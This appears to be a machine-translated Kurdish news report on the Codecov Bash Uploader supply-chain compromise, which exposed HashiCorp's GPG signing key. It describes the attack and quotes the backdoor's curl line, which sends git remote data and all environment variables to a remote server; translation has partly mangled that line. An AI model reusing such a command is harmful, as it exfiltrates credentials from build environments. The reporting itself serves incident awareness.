HashiCorp, ku ji bo pêşvebirina amûrên çavkaniya vekirî Vagrant, Packer, Nomad û Terraform tê zanîn, derketina mifteya taybet a GPG-ê ya ku ji bo afirandina îmzeyên dîjîtal ên ku verastkirinan verast dikin tê bikar anîn ragihand. Êrîşkerên ku gihîştina mifteya GPG-ê bi potansiyel dikarin guheztinên veşartî li hilberên HashiCorp bikin û wan bi îmzeyek dîjîtal a rast verast bikin. Di heman demê de, pargîdaniyê diyar kir ku di dema kontrolê de, ti şopên hewildanên çêkirina guhertinên bi vî rengî nehatine nas kirin.
Heya nuha, mifteya GPG-ê ya lihevhatî hate betal kirin û li şûna wê mifteyek nû hate danîn. Pirsgirêk tenê bandor li verastkirinê kir ku pelên SHA256SUM û SHA256SUM.sig bikar tîne, û bandor li hilberîna îmzeyên dîjîtal ên ji bo pakêtên Linux DEB û RPM yên ku bi navgîniya releases.hashicorp.com ve têne peyda kirin, û her weha mekanîzmayên verastkirina berdanê ji bo macOS û Windows (AuthentiCode) nekir. .
Derketin ji ber bikaranîna skrîpta Codecov Bash Uploader (codecov-bash) di binesaziyê de, ku ji bo daxistina raporên vegirtinê ji pergalên entegrasyonê yên domdar hatî çêkirin, çêbû. Di dema êrîşa li ser pargîdaniya Codecov de, deriyek paşde di nav skrîpta diyarkirî de hate veşartin, ku bi navgîniya şîfre û mifteyên şîfrekirinê ji servera êrîşkaran re hatin şandin.
Ji bo hackkirinê, êrîşkaran di pêvajoya afirandina wêneya Codecov Docker de ji xeletiyek sûd werdigirin, ku hişt ku ew daneyên gihîştina GCS (Google Cloud Storage) derxînin, ku hewce ye ku guhartinên li skrîpta Bash Uploader-ê ku ji codecov.io hatî belav kirin bikin. malpera. Guhertin di 31ê Kanûna Duyem de hatin kirin, du mehan nedihatin dîtin û destûr da êrîşkaran ku agahdariya ku di hawîrdorên pergala entegrasyona domdar a xerîdar de hatine hilanîn derxînin. Bi karanîna koda xirab a lêzêdekirî, êrîşkar dikaribûn di derheqê depoya Git-ê ya ceribandin û hemî guhêrbarên hawîrdorê de, di nav de nîşanek, mifteyên şîfrekirinê û şîfreyên ku ji pergalên entegrasyonê yên domdar re hatine veguheztin agahdarî bistînin da ku gihandina koda serîlêdanê, depo û karûbarên wekî Karûbarên Web Amazon û GitHub organîze bikin.
Digel banga rasterast, skrîpta Codecov Bash Uploader wekî beşek ji barkerên din, wek Codecov-action (Github), Codecov-circleci-orb û Codecov-bitrise-step, hate bikar anîn, ku bikarhênerên wan jî ji pirsgirêkê bandor dibin. Hemî bikarhênerên codecov-bash û hilberên têkildar têne pêşniyar kirin ku binesaziyên xwe kontrol bikin, û hem jî şîfre û bişkojkên şîfrekirinê biguhezînin. Hûn dikarin bi hebûna rêzika curl -sm 0.5 -d "$(git remote -v)<<<<<<< ENV $(env)" hebûna paşverûyek di skrîptekê de kontrol bikin. /barkirin/v2 || rast
Source: opennet.ru